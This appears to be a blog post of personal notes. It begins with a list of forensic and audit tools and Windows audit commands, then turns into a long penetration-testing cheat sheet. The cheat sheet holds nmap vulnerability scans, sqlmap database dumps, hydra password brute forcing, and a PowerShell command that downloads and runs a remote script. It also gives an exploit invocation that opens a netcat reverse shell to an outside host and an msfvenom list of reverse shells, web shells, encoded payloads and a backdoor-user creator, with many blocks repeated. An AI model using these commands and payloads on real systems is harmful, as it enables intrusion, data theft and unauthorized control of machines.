Special Software for special task
- Audit Windows AD - Gold Finger
- Exe analyse - Pestudio
- Screen recorder - CamStudio, Faststone, TinyTake
- analyze hard drive space - winDirstat,Jdiskreport, Treesize free
- Delete files - file shredder
- IT Audit - NSauditor tool
- Hard drive health - hard disk sentinel
- OCR - ABBYY
- Forensic software - FTK Imager, Autopsy,Pro discovery
- Mobile forensic - Oxygen, Mobiledit
- Picture details - Exif Reader
- Software Firewall - Zone Alarm, Comodo, Pfsense
- RAM capture software - DumpIT, volatility,
- Bootable pen drive - Universal USB,
- Delete file recovery - Recuva,
- Network Administrator tools - https://www.netadmintools.com/
- https://techtalk.gfi.com/top-20-free-digital-forensic-investigation-tools-for-sysadmins/
For PC, Domain Audit
Windows
current user - cmd - query user or whoami
user list - WMIC useraccount get name,sid
1001-active, 500 deactivate
At Domain controller -
cmd- net user /domain administrator
cmd - gpresult /r - group policy info
Run - rsop.msc - resultant set of policy
Run - gpedit.msc - (local group policy editor, Group policy management editor)
Run - gpupdate /force - update group policy
Run - rsop.msc - resultant set of policy
Run - gpedit.msc - (local group policy editor, Group policy management editor)
Run - gpupdate /force - update group policy
MAC
users and groups
software update -
Applications - hit Command+Shift+A
System preferences - Basic Information of MAC
CMD
query user
wmic baseboard get product,version,serialnumber,product
net share
runas /user:yourdomainadministrator cmd
doskey /history
ipconfig && mspaint
driverquery
tree
nslookup
route print
systeminfo
netstat -tulpn
Network scan using cmd - C:\Users\user\Desktop>for /L %i in (0,1,255) do ping -n 1 -w 250 192.168.8.%i>>ip-list.txt
gpresult /r
masscan -e tun0 -p0-65535 --max-rate 500 10.10.10.8
nmap -A -p80 10.10.10.8
nmap -sV -O -F --version-light 10.10.10.3 > fullscan.txt
nmap -p 445 --script vuln 10.10.10.4
nmap -Pn --script vuln 192.168.1.105
nmap --script nmap-vulners -sV 11.22.33.44
nmap --script nmap-vulners -sV -p# ###.###.###.###
nmap --script vulscan -sV -p# ###.###.###.###
nmap -sV --script=vulscan/vulscan.nse www.example.com
Android Pen Testing
adb - Android (port 5555)
adb connect 192.168.8.101
adb devices
adb shell
rm -rf password.key
https://devhints.io/adb
Debian
nc -lvnp
rm -r * - delete all files, folders in directory
python -m pyftpdlib -p 21 w
python -m SimpleHTTPServer
smbclient -L \\\\10.10.10.4\\
smbclient -L=10.10.0.2
smbclient //10.10.10.40/Share
nbtscan 10.0.2.5
python setup.py install
msfconsole -r unicorn.rc - using unicorn.py
add exploits to msfdb
/usr/share/metasploit-framework/modules/exploits
add hostname - etc/hosts
netstat -alnp | grep 443
kill -9 psid
ssh-keygen
chmod 600/700 id_rsa
ssh -i id_rsa user@10.10.10.200
su admin
$ /bin/bash -i
tcpdump -i IP icmp
dig @10.13.37.10 -x 10.13.37.10
pip install -r requirements.txt
davtest -url http://10.10.10.15/
gobuster dir -u http://10.10.10.15/ -w /usr/share/wordlists/dirb/common.txt -t 40 -x .php,.txt,.html
gobuster dir -u http://staging-order.mango.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -c 'PHPSESSID=lsh2usjd9gmtkcevpn1deidtla' -o out.txt
netdiscover -i eth0
netdiscover -i eth0 -r 192.168.1.0/24
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:8000/Sherlock.ps1')"
evil-winrm -i 192.168.1.100 -u username -p 'passwd!' -s './' -e './'
sqlmap -r login.req --random-agent --level=5 --risk=3 --dbs
sqlmap -r login.req --random-agent --level=5 --risk=3 -D dbname --tables
sqlmap -r login.req --random-agent --level=5 --risk=3 -D dbname -T tablenm --dump
sqlmap -r search.req --dbms mysql --technique=U --dump --batch
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=Raw-SHA256
curl -vsk http://staging-order.mango.htb/home.php
wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
python 47837.py 10.10.10.165 80 whoami
python 47837.py 10.10.10.165 80 “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 9001 >/tmp/f”
python -m pyftpdlib -p 21 w
python -m SimpleHTTPServer
smbclient -L \\\\10.10.10.4\\
smbclient -L=10.10.0.2
smbclient //10.10.10.40/Share
nbtscan 10.0.2.5
python setup.py install
msfconsole -r unicorn.rc - using unicorn.py
add exploits to msfdb
/usr/share/metasploit-framework/modules/exploits
add hostname - etc/hosts
netstat -alnp | grep 443
kill -9 psid
ssh-keygen
chmod 600/700 id_rsa
ssh -i id_rsa user@10.10.10.200
su admin
$ /bin/bash -i
tcpdump -i IP icmp
dig @10.13.37.10 -x 10.13.37.10
pip install -r requirements.txt
davtest -url http://10.10.10.15/
gobuster dir -u http://10.10.10.15/ -w /usr/share/wordlists/dirb/common.txt -t 40 -x .php,.txt,.html
gobuster dir -u http://staging-order.mango.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -c 'PHPSESSID=lsh2usjd9gmtkcevpn1deidtla' -o out.txt
netdiscover -i eth0
netdiscover -i eth0 -r 192.168.1.0/24
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7:8000/Sherlock.ps1')"
evil-winrm -i 192.168.1.100 -u username -p 'passwd!' -s './' -e './'
sqlmap -r login.req --random-agent --level=5 --risk=3 --dbs
sqlmap -r login.req --random-agent --level=5 --risk=3 -D dbname --tables
sqlmap -r login.req --random-agent --level=5 --risk=3 -D dbname -T tablenm --dump
sqlmap -r search.req --dbms mysql --technique=U --dump --batch
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=Raw-SHA256
curl -vsk http://staging-order.mango.htb/home.php
wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
python 47837.py 10.10.10.165 80 whoami
python 47837.py 10.10.10.165 80 “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.140 9001 >/tmp/f”
cp /usr/share/exploitdb/exploits/multiple/remote/10.c .
gcc -o exploit 10.c -lcrypto
./exploit
./exploit <the os type> <ip> -c <open connections>
python -c 'import pty;pty.spawn("/bin/bash")' - Privilege escalation
hydra -l mike -P /usr/share/wordlists/rockyou.txt "http-post-form://10.10.216.62:8888/login:user=^USER^&password=^PASS^:Invalid"
scp /home/kali/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh jan@10.10.195.21:/dev/shm
MSFVENOM Cheat Sheet
hydra -l mike -P /usr/share/wordlists/rockyou.txt "http-post-form://10.10.216.62:8888/login:user=^USER^&password=^PASS^:Invalid"
scp /home/kali/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh jan@10.10.195.21:/dev/shm
MSFVENOM Cheat Sheet
List payloadsmsfvenom -l
Binaries Payloads
Linux Meterpreter Reverse Shellmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf
Linux Bind Meterpreter Shellmsfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf
Linux Bind Shellmsfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf
Windows Meterpreter Reverse TCP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
Windows Reverse TCP Shell
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
msfvenom -p windows/shell/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe
Windows Encoded Meterpreter Windows Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe
Mac Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f macho > shell.macho
Mac Bind Shell
msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho > bind.macho
msfvenom -p osx/x86/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f macho > bind.macho
Web Payloads
PHP Meterpreter Reverse TCP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.php
cat shell.php | pbcopy && echo ‘<?php ‘ | tr -d ‘\n’ > shell.php && pbpaste >> shell.php
ASP Meterpreter Reverse TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f asp > shell.asp
JSP Java Meterpreter Reverse TCP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.jsp
WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f war > shell.war
Scripting Payloads
Python Reverse Shell
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py
Python Reverse Shell
msfvenom -p cmd/unix/reverse_python LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.py
Bash Unix Reverse Shell
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
msfvenom -p cmd/unix/reverse_bash LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.sh
Perl Unix Reverse shell
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl
msfvenom -p cmd/unix/reverse_perl LHOST=<Local IP Address> LPORT=<Local Port> -f raw > shell.pl
Shellcode
Windows Meterpreter Reverse TCP Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
Linux Meterpreter Reverse TCP Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
Mac Reverse TCP Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f <language>
Create User
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
msfvenom -p windows/adduser USER=hacker PASS=Hacker123$ -f exe > adduser.exe
No comments:
Post a Comment